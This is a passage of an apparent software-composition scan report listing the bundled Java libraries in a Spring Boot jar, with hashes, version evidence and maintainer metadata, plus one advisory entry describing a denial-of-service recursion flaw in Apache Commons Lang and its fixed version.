File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/classmate-1.3.4.jar
MD5: 1e2e0fcc510753882683417e01895242
SHA1: 03d5f48f10bbe4eb7bd862f10c0583be2e0053c6
SHA256: c2bfcc21467351d0f9a1558822b72dbac2b21f6b9f700a44fc6b345491ef3c88
Evidence Type Source Name Value Confidence Vendor file name classmate High Vendor jar package name classmate Highest Vendor jar package name fasterxml Highest Vendor jar package name types Highest Vendor Manifest automatic-module-name com.fasterxml.classmate Medium Vendor Manifest bundle-docurl http://github.com/FasterXML/java-classmate Low Vendor Manifest bundle-symbolicname com.fasterxml.classmate Medium Vendor Manifest implementation-build-date 2017-09-09 21:47:22+0000 Low Vendor Manifest Implementation-Vendor fasterxml.com High Vendor Manifest Implementation-Vendor-Id com.fasterxml Medium Vendor Manifest specification-vendor fasterxml.com Low Vendor pom artifactid classmate Low Vendor pom developer email blangel@ocheyedan.net Low Vendor pom developer email tatu@fasterxml.com Low Vendor pom developer id blangel Medium Vendor pom developer id tatu Medium Vendor pom developer name Brian Langel Medium Vendor pom developer name Tatu Saloranta Medium Vendor pom groupid com.fasterxml Highest Vendor pom name ClassMate High Vendor pom organization name fasterxml.com High Vendor pom organization url http://fasterxml.com Medium Vendor pom parent-artifactid oss-parent Low Vendor pom url http://github.com/FasterXML/java-classmate Highest Product file name classmate High Product jar package name classmate Highest Product jar package name fasterxml Highest Product jar package name types Highest Product Manifest automatic-module-name com.fasterxml.classmate Medium Product Manifest bundle-docurl http://github.com/FasterXML/java-classmate Low Product Manifest Bundle-Name ClassMate Medium Product Manifest bundle-symbolicname com.fasterxml.classmate Medium Product Manifest implementation-build-date 2017-09-09 21:47:22+0000 Low Product Manifest Implementation-Title ClassMate High Product Manifest specification-title ClassMate Medium Product pom artifactid classmate Highest Product pom developer email blangel@ocheyedan.net Low Product pom developer email tatu@fasterxml.com Low 
Product pom developer id blangel Low Product pom developer id tatu Low Product pom developer name Brian Langel Low Product pom developer name Tatu Saloranta Low Product pom groupid com.fasterxml Highest Product pom name ClassMate High Product pom organization name fasterxml.com Low Product pom organization url http://fasterxml.com Low Product pom parent-artifactid oss-parent Medium Product pom url http://github.com/FasterXML/java-classmate Medium Version file version 1.3.4 High Version Manifest Bundle-Version 1.3.4 High Version Manifest Implementation-Version 1.3.4 High Version pom parent-version 1.3.4 Low Version pom version 1.3.4 Highest
spring-music-sqldb-1.0.jar: client-runtime-1.0.0.jar
Description:
This package contains the basic runtime for AutoRest generated Java clients.
License:
The MIT License (MIT): http://opensource.org/licenses/MIT
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/client-runtime-1.0.0.jar
MD5: ea31cb0e32ea8a1c48cb0b7e7f0a455b
SHA1: 44e60e33655f29e6179708b87e2421abb6e2e8fb
SHA256: 31e2238350905ac1f1bbf79b7d5949b7f70c5f6ea36f3065e5edf884353eef8b
Evidence Type Source Name Value Confidence Vendor file name client-runtime High Vendor jar package name microsoft Highest Vendor jar package name microsoft Low Vendor jar package name rest Highest Vendor jar package name rest Low Vendor pom artifactid client-runtime Low Vendor pom developer id microsoft Medium Vendor pom developer name Microsoft Medium Vendor pom groupid com.microsoft.rest Highest Vendor pom name Java Client Runtime for AutoRest High Vendor pom parent-artifactid autorest-clientruntime-for-java Low Vendor pom parent-groupid com.microsoft.azure Medium Vendor pom url Azure/autorest-clientruntime-for-java Highest Product file name client-runtime High Product jar package name microsoft Highest Product jar package name rest Highest Product jar package name rest Low Product pom artifactid client-runtime Highest Product pom developer id microsoft Low Product pom developer name Microsoft Low Product pom groupid com.microsoft.rest Highest Product pom name Java Client Runtime for AutoRest High Product pom parent-artifactid autorest-clientruntime-for-java Medium Product pom parent-groupid com.microsoft.azure Medium Product pom url Azure/autorest-clientruntime-for-java High Version file version 1.0.0 High Version pom version 1.0.0 Highest
spring-music-sqldb-1.0.jar: commons-codec-1.11.jar
Description:
The Apache Commons Codec package contains simple encoders and decoders for various formats such as Base64 and Hexadecimal. In addition to these widely used encoders and decoders, the codec package also maintains a collection of phonetic encoding utilities.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/commons-codec-1.11.jar
MD5: 567159b1ae257a43e1391a8f59d24cfe
SHA1: 3acb4705652e16236558f0f4f2192cc33c3bd189
SHA256: e599d5318e97aa48f42136a2927e6dfa4e8881dff0e6c8e3109ddbbff51d7b7d
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | commons-codec | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | codec | Highest
Vendor | jar | package name | commons | Highest
Vendor | jar | package name | encoder | Highest
Vendor | Manifest | automatic-module-name | org.apache.commons.codec | Medium
Vendor | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-codec/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.commons.codec | Medium
Vendor | Manifest | implementation-url | http://commons.apache.org/proper/commons-codec/ | Low
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | commons-codec | Medium
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | commons-codec | Low
Vendor | pom | developer email | bayard@apache.org | Low
Vendor | pom | developer email | dgraham@apache.org | Low
Vendor | pom | developer email | dlr@finemaltcoding.com | Low
Vendor | pom | developer email | ggregory@apache.org | Low
Vendor | pom | developer email | jon@collab.net | Low
Vendor | pom | developer email | julius@apache.org | Low
Vendor | pom | developer email | rwaldhoff@apache.org | Low
Vendor | pom | developer email | sanders@totalsync.com | Low
Vendor | pom | developer email | tn@apache.org | Low
Vendor | pom | developer email | tobrien@apache.org | Low
Vendor | pom | developer id | bayard | Medium
Vendor | pom | developer id | dgraham | Medium
Vendor | pom | developer id | dlr | Medium
Vendor | pom | developer id | ggregory | Medium
Vendor | pom | developer id | jon | Medium
Vendor | pom | developer id | julius | Medium
Vendor | pom | developer id | rwaldhoff | Medium
Vendor | pom | developer id | sanders | Medium
Vendor | pom | developer id | tn | Medium
Vendor | pom | developer id | tobrien | Medium
Vendor | pom | developer name | Daniel Rall | Medium
Vendor | pom | developer name | David Graham | Medium
Vendor | pom | developer name | Gary Gregory | Medium
Vendor | pom | developer name | Henri Yandell | Medium
Vendor | pom | developer name | Jon S. Stevens | Medium
Vendor | pom | developer name | Julius Davies | Medium
Vendor | pom | developer name | Rodney Waldhoff | Medium
Vendor | pom | developer name | Scott Sanders | Medium
Vendor | pom | developer name | Thomas Neidhart | Medium
Vendor | pom | developer name | Tim OBrien | Medium
Vendor | pom | developer org URL | http://juliusdavies.ca/ | Medium
Vendor | pom | groupid | commons-codec | Highest
Vendor | pom | name | Apache Commons Codec | High
Vendor | pom | parent-artifactid | commons-parent | Low
Vendor | pom | parent-groupid | org.apache.commons | Medium
Vendor | pom | url | http://commons.apache.org/proper/commons-codec/ | Highest
Product | file | name | commons-codec | High
Product | jar | package name | apache | Highest
Product | jar | package name | codec | Highest
Product | jar | package name | commons | Highest
Product | jar | package name | encoder | Highest
Product | Manifest | automatic-module-name | org.apache.commons.codec | Medium
Product | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-codec/ | Low
Product | Manifest | Bundle-Name | Apache Commons Codec | Medium
Product | Manifest | bundle-symbolicname | org.apache.commons.codec | Medium
Product | Manifest | Implementation-Title | Apache Commons Codec | High
Product | Manifest | implementation-url | http://commons.apache.org/proper/commons-codec/ | Low
Product | Manifest | specification-title | Apache Commons Codec | Medium
Product | pom | artifactid | commons-codec | Highest
Product | pom | developer email | bayard@apache.org | Low
Product | pom | developer email | dgraham@apache.org | Low
Product | pom | developer email | dlr@finemaltcoding.com | Low
Product | pom | developer email | ggregory@apache.org | Low
Product | pom | developer email | jon@collab.net | Low
Product | pom | developer email | julius@apache.org | Low
Product | pom | developer email | rwaldhoff@apache.org | Low
Product | pom | developer email | sanders@totalsync.com | Low
Product | pom | developer email | tn@apache.org | Low
Product | pom | developer email | tobrien@apache.org | Low
Product | pom | developer id | bayard | Low
Product | pom | developer id | dgraham | Low
Product | pom | developer id | dlr | Low
Product | pom | developer id | ggregory | Low
Product | pom | developer id | jon | Low
Product | pom | developer id | julius | Low
Product | pom | developer id | rwaldhoff | Low
Product | pom | developer id | sanders | Low
Product | pom | developer id | tn | Low
Product | pom | developer id | tobrien | Low
Product | pom | developer name | Daniel Rall | Low
Product | pom | developer name | David Graham | Low
Product | pom | developer name | Gary Gregory | Low
Product | pom | developer name | Henri Yandell | Low
Product | pom | developer name | Jon S. Stevens | Low
Product | pom | developer name | Julius Davies | Low
Product | pom | developer name | Rodney Waldhoff | Low
Product | pom | developer name | Scott Sanders | Low
Product | pom | developer name | Thomas Neidhart | Low
Product | pom | developer name | Tim OBrien | Low
Product | pom | developer org URL | http://juliusdavies.ca/ | Low
Product | pom | groupid | commons-codec | Highest
Product | pom | name | Apache Commons Codec | High
Product | pom | parent-artifactid | commons-parent | Medium
Product | pom | parent-groupid | org.apache.commons | Medium
Product | pom | url | http://commons.apache.org/proper/commons-codec/ | Medium
Version | file | version | 1.11 | High
Version | Manifest | Implementation-Version | 1.11 | High
Version | pom | parent-version | 1.11 | Low
Version | pom | version | 1.11 | Highest
spring-music-sqldb-1.0.jar: commons-collections4-4.1.jar
Description:
The Apache Commons Collections package contains types that extend and augment the Java Collections Framework.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/commons-collections4-4.1.jar
MD5: 45af6a8e5b51d5945de6c7411e290bd1
SHA1: a4cf4688fe1c7e3a63aa636cc96d013af537768e
SHA256: b1fe8b5968b57d8465425357ed2d9dc695504518bed2df5b565c4b8e68c1c8a5
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | commons-collections4 | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | collections4 | Highest
Vendor | jar | package name | commons | Highest
Vendor | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-collections/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.commons.collections4 | Medium
Vendor | Manifest | implementation-build | tags/COLLECTIONS_4_1_RC2@r1716550; 2015-11-25 22:53:13+0100 | Low
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache | Medium
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | commons-collections4 | Low
Vendor | pom | developer id | adriannistor | Medium
Vendor | pom | developer id | amamment | Medium
Vendor | pom | developer id | bayard | Medium
Vendor | pom | developer id | craigmcc | Medium
Vendor | pom | developer id | dlaha | Medium
Vendor | pom | developer id | geirm | Medium
Vendor | pom | developer id | ggregory | Medium
Vendor | pom | developer id | jcarman | Medium
Vendor | pom | developer id | luc | Medium
Vendor | pom | developer id | matth | Medium
Vendor | pom | developer id | mbenson | Medium
Vendor | pom | developer id | morgand | Medium
Vendor | pom | developer id | psteitz | Medium
Vendor | pom | developer id | rdonkin | Medium
Vendor | pom | developer id | rwaldhoff | Medium
Vendor | pom | developer id | scolebourne | Medium
Vendor | pom | developer id | tn | Medium
Vendor | pom | developer name | Adrian Nistor | Medium
Vendor | pom | developer name | Arun M. Thomas | Medium
Vendor | pom | developer name | Craig McClanahan | Medium
Vendor | pom | developer name | Dipanjan Laha | Medium
Vendor | pom | developer name | Gary D. Gregory | Medium
Vendor | pom | developer name | Geir Magnusson | Medium
Vendor | pom | developer name | Henri Yandell | Medium
Vendor | pom | developer name | James Carman | Medium
Vendor | pom | developer name | Luc Maisonobe | Medium
Vendor | pom | developer name | Matt Benson | Medium
Vendor | pom | developer name | Matthew Hawthorne | Medium
Vendor | pom | developer name | Morgan Delagrange | Medium
Vendor | pom | developer name | Phil Steitz | Medium
Vendor | pom | developer name | Robert Burrell Donkin | Medium
Vendor | pom | developer name | Rodney Waldhoff | Medium
Vendor | pom | developer name | Stephen Colebourne | Medium
Vendor | pom | developer name | Thomas Neidhart | Medium
Vendor | pom | groupid | org.apache.commons | Highest
Vendor | pom | name | Apache Commons Collections | High
Vendor | pom | parent-artifactid | commons-parent | Low
Vendor | pom | url | http://commons.apache.org/proper/commons-collections/ | Highest
Product | file | name | commons-collections4 | High
Product | jar | package name | apache | Highest
Product | jar | package name | collections4 | Highest
Product | jar | package name | commons | Highest
Product | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-collections/ | Low
Product | Manifest | Bundle-Name | Apache Commons Collections | Medium
Product | Manifest | bundle-symbolicname | org.apache.commons.collections4 | Medium
Product | Manifest | implementation-build | tags/COLLECTIONS_4_1_RC2@r1716550; 2015-11-25 22:53:13+0100 | Low
Product | Manifest | Implementation-Title | Apache Commons Collections | High
Product | Manifest | specification-title | Apache Commons Collections | Medium
Product | pom | artifactid | commons-collections4 | Highest
Product | pom | developer id | adriannistor | Low
Product | pom | developer id | amamment | Low
Product | pom | developer id | bayard | Low
Product | pom | developer id | craigmcc | Low
Product | pom | developer id | dlaha | Low
Product | pom | developer id | geirm | Low
Product | pom | developer id | ggregory | Low
Product | pom | developer id | jcarman | Low
Product | pom | developer id | luc | Low
Product | pom | developer id | matth | Low
Product | pom | developer id | mbenson | Low
Product | pom | developer id | morgand | Low
Product | pom | developer id | psteitz | Low
Product | pom | developer id | rdonkin | Low
Product | pom | developer id | rwaldhoff | Low
Product | pom | developer id | scolebourne | Low
Product | pom | developer id | tn | Low
Product | pom | developer name | Adrian Nistor | Low
Product | pom | developer name | Arun M. Thomas | Low
Product | pom | developer name | Craig McClanahan | Low
Product | pom | developer name | Dipanjan Laha | Low
Product | pom | developer name | Gary D. Gregory | Low
Product | pom | developer name | Geir Magnusson | Low
Product | pom | developer name | Henri Yandell | Low
Product | pom | developer name | James Carman | Low
Product | pom | developer name | Luc Maisonobe | Low
Product | pom | developer name | Matt Benson | Low
Product | pom | developer name | Matthew Hawthorne | Low
Product | pom | developer name | Morgan Delagrange | Low
Product | pom | developer name | Phil Steitz | Low
Product | pom | developer name | Robert Burrell Donkin | Low
Product | pom | developer name | Rodney Waldhoff | Low
Product | pom | developer name | Stephen Colebourne | Low
Product | pom | developer name | Thomas Neidhart | Low
Product | pom | groupid | org.apache.commons | Highest
Product | pom | name | Apache Commons Collections | High
Product | pom | parent-artifactid | commons-parent | Medium
Product | pom | url | http://commons.apache.org/proper/commons-collections/ | Medium
Version | file | version | 4.1 | High
Version | Manifest | Implementation-Version | 4.1 | High
Version | pom | parent-version | 4.1 | Low
Version | pom | version | 4.1 | Highest
spring-music-sqldb-1.0.jar: commons-lang3-3.7.jar
Description:
Apache Commons Lang, a package of Java utility classes for the classes that are in java.lang's hierarchy, or are considered to be so standard as to justify existence in java.lang.
License:
https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/commons-lang3-3.7.jar
MD5: f1df5623d78c432b7c3d58ff491e1801
SHA1: 557edd918fd41f9260963583ebf5a61a43a6b423
SHA256: 6e8dc31e046508d9953c96534edf0c2e0bfe6f468966b5b842b3f87e43b6a847
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | commons-lang3 | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | commons | Highest
Vendor | jar | package name | lang3 | Highest
Vendor | Manifest | automatic-module-name | org.apache.commons.lang3 | Medium
Vendor | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-lang/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.commons.lang3 | Medium
Vendor | Manifest | implementation-url | http://commons.apache.org/proper/commons-lang/ | Low
Vendor | Manifest | Implementation-Vendor | The Apache Software Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | org.apache.commons | Medium
Vendor | Manifest | specification-vendor | The Apache Software Foundation | Low
Vendor | pom | artifactid | commons-lang3 | Low
Vendor | pom | developer email | bayard@apache.org | Low
Vendor | pom | developer email | britter@apache.org | Low
Vendor | pom | developer email | chtompki@apache.org | Low
Vendor | pom | developer email | djones@apache.org | Low
Vendor | pom | developer email | dlr@finemaltcoding.com | Low
Vendor | pom | developer email | ggregory@apache.org | Low
Vendor | pom | developer email | jcarman@apache.org | Low
Vendor | pom | developer email | joerg.schaible@gmx.de | Low
Vendor | pom | developer email | lguibert@apache.org | Low
Vendor | pom | developer email | oheger@apache.org | Low
Vendor | pom | developer email | pbenedict@apache.org | Low
Vendor | pom | developer email | rdonkin@apache.org | Low
Vendor | pom | developer email | scolebourne@joda.org | Low
Vendor | pom | developer email | stevencaswell@apache.org | Low
Vendor | pom | developer id | bayard | Medium
Vendor | pom | developer id | britter | Medium
Vendor | pom | developer id | chtompki | Medium
Vendor | pom | developer id | djones | Medium
Vendor | pom | developer id | dlr | Medium
Vendor | pom | developer id | fredrik | Medium
Vendor | pom | developer id | ggregory | Medium
Vendor | pom | developer id | jcarman | Medium
Vendor | pom | developer id | joehni | Medium
Vendor | pom | developer id | lguibert | Medium
Vendor | pom | developer id | mbenson | Medium
Vendor | pom | developer id | niallp | Medium
Vendor | pom | developer id | oheger | Medium
Vendor | pom | developer id | pbenedict | Medium
Vendor | pom | developer id | rdonkin | Medium
Vendor | pom | developer id | scaswell | Medium
Vendor | pom | developer id | scolebourne | Medium
Vendor | pom | developer name | Benedikt Ritter | Medium
Vendor | pom | developer name | Daniel Rall | Medium
Vendor | pom | developer name | Duncan Jones | Medium
Vendor | pom | developer name | Fredrik Westermarck | Medium
Vendor | pom | developer name | Gary D. Gregory | Medium
Vendor | pom | developer name | Henri Yandell | Medium
Vendor | pom | developer name | James Carman | Medium
Vendor | pom | developer name | Joerg Schaible | Medium
Vendor | pom | developer name | Loic Guibert | Medium
Vendor | pom | developer name | Matt Benson | Medium
Vendor | pom | developer name | Niall Pemberton | Medium
Vendor | pom | developer name | Oliver Heger | Medium
Vendor | pom | developer name | Paul Benedict | Medium
Vendor | pom | developer name | Rob Tompkins | Medium
Vendor | pom | developer name | Robert Burrell Donkin | Medium
Vendor | pom | developer name | Stephen Colebourne | Medium
Vendor | pom | developer name | Steven Caswell | Medium
Vendor | pom | developer org | Carman Consulting, Inc. | Medium
Vendor | pom | developer org | CollabNet, Inc. | Medium
Vendor | pom | developer org | SITA ATS Ltd | Medium
Vendor | pom | groupid | org.apache.commons | Highest
Vendor | pom | name | Apache Commons Lang | High
Vendor | pom | parent-artifactid | commons-parent | Low
Vendor | pom | url | http://commons.apache.org/proper/commons-lang/ | Highest
Product | file | name | commons-lang3 | High
Product | jar | package name | apache | Highest
Product | jar | package name | commons | Highest
Product | jar | package name | lang3 | Highest
Product | Manifest | automatic-module-name | org.apache.commons.lang3 | Medium
Product | Manifest | bundle-docurl | http://commons.apache.org/proper/commons-lang/ | Low
Product | Manifest | Bundle-Name | Apache Commons Lang | Medium
Product | Manifest | bundle-symbolicname | org.apache.commons.lang3 | Medium
Product | Manifest | Implementation-Title | Apache Commons Lang | High
Product | Manifest | implementation-url | http://commons.apache.org/proper/commons-lang/ | Low
Product | Manifest | specification-title | Apache Commons Lang | Medium
Product | pom | artifactid | commons-lang3 | Highest
Product | pom | developer email | bayard@apache.org | Low
Product | pom | developer email | britter@apache.org | Low
Product | pom | developer email | chtompki@apache.org | Low
Product | pom | developer email | djones@apache.org | Low
Product | pom | developer email | dlr@finemaltcoding.com | Low
Product | pom | developer email | ggregory@apache.org | Low
Product | pom | developer email | jcarman@apache.org | Low
Product | pom | developer email | joerg.schaible@gmx.de | Low
Product | pom | developer email | lguibert@apache.org | Low
Product | pom | developer email | oheger@apache.org | Low
Product | pom | developer email | pbenedict@apache.org | Low
Product | pom | developer email | rdonkin@apache.org | Low
Product | pom | developer email | scolebourne@joda.org | Low
Product | pom | developer email | stevencaswell@apache.org | Low
Product | pom | developer id | bayard | Low
Product | pom | developer id | britter | Low
Product | pom | developer id | chtompki | Low
Product | pom | developer id | djones | Low
Product | pom | developer id | dlr | Low
Product | pom | developer id | fredrik | Low
Product | pom | developer id | ggregory | Low
Product | pom | developer id | jcarman | Low
Product | pom | developer id | joehni | Low
Product | pom | developer id | lguibert | Low
Product | pom | developer id | mbenson | Low
Product | pom | developer id | niallp | Low
Product | pom | developer id | oheger | Low
Product | pom | developer id | pbenedict | Low
Product | pom | developer id | rdonkin | Low
Product | pom | developer id | scaswell | Low
Product | pom | developer id | scolebourne | Low
Product | pom | developer name | Benedikt Ritter | Low
Product | pom | developer name | Daniel Rall | Low
Product | pom | developer name | Duncan Jones | Low
Product | pom | developer name | Fredrik Westermarck | Low
Product | pom | developer name | Gary D. Gregory | Low
Product | pom | developer name | Henri Yandell | Low
Product | pom | developer name | James Carman | Low
Product | pom | developer name | Joerg Schaible | Low
Product | pom | developer name | Loic Guibert | Low
Product | pom | developer name | Matt Benson | Low
Product | pom | developer name | Niall Pemberton | Low
Product | pom | developer name | Oliver Heger | Low
Product | pom | developer name | Paul Benedict | Low
Product | pom | developer name | Rob Tompkins | Low
Product | pom | developer name | Robert Burrell Donkin | Low
Product | pom | developer name | Stephen Colebourne | Low
Product | pom | developer name | Steven Caswell | Low
Product | pom | developer org | Carman Consulting, Inc. | Low
Product | pom | developer org | CollabNet, Inc. | Low
Product | pom | developer org | SITA ATS Ltd | Low
Product | pom | groupid | org.apache.commons | Highest
Product | pom | name | Apache Commons Lang | High
Product | pom | parent-artifactid | commons-parent | Medium
Product | pom | url | http://commons.apache.org/proper/commons-lang/ | Medium
Version | file | version | 3.7 | High
Version | Manifest | Implementation-Version | 3.7 | High
Version | pom | parent-version | 3.7 | Low
Version | pom | version | 3.7 | Highest
CVE-2025-48924 (OSSINDEX)
Uncontrolled Recursion vulnerability in Apache Commons Lang.
This issue affects Apache Commons Lang: commons-lang:commons-lang from 2.0 through 2.6, and org.apache.commons:commons-lang3 from 3.0 before 3.18.0.
The ClassUtils.getClass(...) methods can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause the application to stop.
Users are recommended to upgrade to version 3.18.0, which fixes the issue.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-48924 for details. CWE-674 Uncontrolled Recursion
CVSSv4: Base Score: MEDIUM (6.9); Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.apache.commons:commons-lang3:3.7:*:*:*:*:*:*:*

spring-music-sqldb-1.0.jar: converter-jackson-2.1.0.jar
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/converter-jackson-2.1.0.jar
MD5: 2a99e66ead438dd054375c3a6b6e37b4
SHA1: ef33476a62d9c62dfca6b6c9e086f2e3343a96f4
SHA256: 1a5522419639b6261b70e9011606954be5ae2c260392c737698bf3cae02929c8
Evidence Type | Source | Name | Value | Confidence
Vendor | file | name | converter-jackson | High
Vendor | jar | package name | converter | Highest
Vendor | jar | package name | converter | Low
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | jackson | Low
Vendor | jar | package name | retrofit2 | Highest
Vendor | jar | package name | retrofit2 | Low
Vendor | pom | artifactid | converter-jackson | Low
Vendor | pom | groupid | com.squareup.retrofit2 | Highest
Vendor | pom | name | Converter: Jackson | High
Vendor | pom | parent-artifactid | retrofit-converters | Low
Product | file | name | converter-jackson | High
Product | jar | package name | converter | Highest
Product | jar | package name | converter | Low
Product | jar | package name | jackson | Highest
Product | jar | package name | jackson | Low
Product | jar | package name | retrofit2 | Highest
Product | pom | artifactid | converter-jackson | Highest
Product | pom | groupid | com.squareup.retrofit2 | Highest
Product | pom | name | Converter: Jackson | High
Product | pom | parent-artifactid | retrofit-converters | Medium
Version | file | version | 2.1.0 | High
Version | pom | version | 2.1.0 | Highest
spring-music-sqldb-1.0.jar: dom4j-1.6.1.jar
Description:
dom4j: the flexible XML framework for Java
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/dom4j-1.6.1.jar
MD5: 4d8f51d3fe3900efc6e395be48030d6d
SHA1: 5d3ccc056b6f056dbf0dddfdf43894b9065a8f94
SHA256: 593552ffea3c5823c6602478b5002a7c525fd904a3c44f1abe4065c22edfac73
Evidence Type | Source | Name | Value | Confidence
Vendor | central | artifactid | dom4j | High
Vendor | central | artifactid | dom4j-1.6.1 | High
Vendor | central | groupid | dom4j | High
Vendor | central | groupid | org.zenframework.z8.dependencies.commons | High
Vendor | file | name | dom4j | High
Vendor | jar | package name | dom4j | Highest
Vendor | jar | package name | dom4j | Low
Vendor | Manifest | extension-name | dom4j | Medium
Vendor | Manifest | Implementation-Vendor | MetaStuff Ltd. | High
Vendor | Manifest | specification-vendor | MetaStuff Ltd. | Low
Vendor | pom | artifactid | dom4j | Low
Vendor | pom | artifactid | dom4j-1.6.1 | Low
Vendor | pom | developer email | carnold@users.sourceforge.net | Low
Vendor | pom | developer email | ddlucas@users.sourceforge.net | Low
Vendor | pom | developer email | drwhite@users.sourceforge.net | Low
Vendor | pom | developer email | jjenkov@users.sourceforge.net | Low
Vendor | pom | developer email | jstrachan@apache.org | Low
Vendor | pom | developer email | laramiec@users.sourceforge.net | Low
Vendor | pom | developer email | maartenc@users.sourceforge.net | Low
Vendor | pom | developer email | mskells@users.sourceforge.net | Low
Vendor | pom | developer email | nicksanderson@users.sourceforge.net | Low
Vendor | pom | developer email | slehmann@users.sourceforge.net | Low
Vendor | pom | developer email | tradem@users.sourceforge.net | Low
Vendor | pom | developer email | werken@users.sourceforge.net | Low
Vendor | pom | developer email | wolfftw@users.sourceforge.net | Low
Vendor | pom | developer email | yeekee@users.sourceforge.net | Low
Vendor | pom | developer email | yruan2@users.sourceforge.net | Low
Vendor | pom | developer id | carnold | Medium
Vendor | pom | developer id | ddlucas | Medium
Vendor | pom | developer id | drwhite | Medium
Vendor | pom | developer id | jjenkov | Medium
Vendor | pom | developer id | jstrachan | Medium
Vendor | pom | developer id | laramiec | Medium
Vendor | pom | developer id | maartenc | Medium
Vendor | pom | developer id | mskells | Medium
Vendor | pom | developer id | nicksanderson | Medium
Vendor | pom | developer id | slehmann | Medium
Vendor | pom | developer id | tradem | Medium
Vendor | pom | developer id | werken | Medium
Vendor | pom | developer id | wolfftw | Medium
Vendor | pom | developer id | yeekee | Medium
Vendor | pom | developer id | yruan2 | Medium
Vendor | pom | developer name | Bob McWhirter | Medium
Vendor | pom | developer name | Curt Arnold | Medium
Vendor | pom | developer name | David Lucas | Medium
Vendor | pom | developer name | David White | Medium
Vendor | pom | developer name | Jakob Jenkov | Medium
Vendor | pom | developer name | James Strachan | Medium
Vendor | pom | developer name | Laramie Crocker | Medium
Vendor | pom | developer name | Maarten Coene | Medium
Vendor | pom | developer name | Michael Skells | Medium
Vendor | pom | developer name | Nick Sanderson | Medium
Vendor | pom | developer name | OuYang Chen | Medium
Vendor | pom | developer name | Steen Lehmann | Medium
Vendor | pom | developer name | Tobias Rademacher | Medium
Vendor | pom | developer name | Todd Wolff | Medium
Vendor | pom | developer name | Yuxin Ruan | Medium
Vendor | pom | developer org | Cronos | Medium
Vendor | pom | developer org | SpiritSoft, Inc. | Medium
Vendor | pom | groupid | dom4j | Highest
Vendor | pom | groupid | org.zenframework.z8.dependencies.commons | Highest
Vendor | pom | name | dom4j | High
Vendor | pom | name | Zenframework Z8 Dependencies - Commons - dom4j-1.6.1 | High
Vendor | pom | organization name | MetaStuff Ltd. | High
Vendor | pom | organization url | http://sourceforge.net/projects/dom4j | Medium
Vendor | pom | parent-artifactid | z8-dependencies | Low
Vendor | pom | parent-groupid | org.zenframework.z8.dependencies | Medium
Vendor | pom | url | http://dom4j.org | Highest
Product | central | artifactid | dom4j | High
Product | central | artifactid | dom4j-1.6.1 | High
Product | file | name | dom4j | High
Product | jar | package name | dom4j | Highest
Product | Manifest | extension-name | dom4j | Medium
Product | Manifest | Implementation-Title | org.dom4j | High
Product | Manifest | specification-title | dom4j : XML framework for Java | Medium
Product | pom | artifactid | dom4j | Highest
Product | pom | artifactid | dom4j-1.6.1 | Highest
Product | pom | developer email | carnold@users.sourceforge.net | Low
Product | pom | developer email | ddlucas@users.sourceforge.net | Low
Product | pom | developer email | drwhite@users.sourceforge.net | Low
Product | pom | developer email | jjenkov@users.sourceforge.net | Low
Product | pom | developer email | jstrachan@apache.org | Low
Product | pom | developer email | laramiec@users.sourceforge.net | Low
Product | pom | developer email | maartenc@users.sourceforge.net | Low
Product | pom | developer email | mskells@users.sourceforge.net | Low
Product | pom | developer email | nicksanderson@users.sourceforge.net | Low
Product | pom | developer email | slehmann@users.sourceforge.net | Low
Product | pom | developer email | tradem@users.sourceforge.net | Low
Product | pom | developer email | werken@users.sourceforge.net | Low
Product | pom | developer email | wolfftw@users.sourceforge.net | Low
Product | pom | developer email | yeekee@users.sourceforge.net | Low
Product | pom | developer email | yruan2@users.sourceforge.net | Low
Product | pom | developer id | carnold | Low
Product | pom | developer id | ddlucas | Low
Product | pom | developer id | drwhite | Low
Product | pom | developer id | jjenkov | Low
Product | pom | developer id | jstrachan | Low
Product | pom | developer id | laramiec | Low
Product | pom | developer id | maartenc | Low
Product | pom | developer id | mskells | Low
Product | pom | developer id | nicksanderson | Low
Product | pom | developer id | slehmann | Low
Product | pom | developer id | tradem | Low
Product | pom | developer id | werken | Low
Product | pom | developer id | wolfftw | Low
Product | pom | developer id | yeekee | Low
Product | pom | developer id | yruan2 | Low
Product | pom | developer name | Bob McWhirter | Low
Product | pom | developer name | Curt Arnold | Low
Product | pom | developer name | David Lucas | Low
Product | pom | developer name | David White | Low
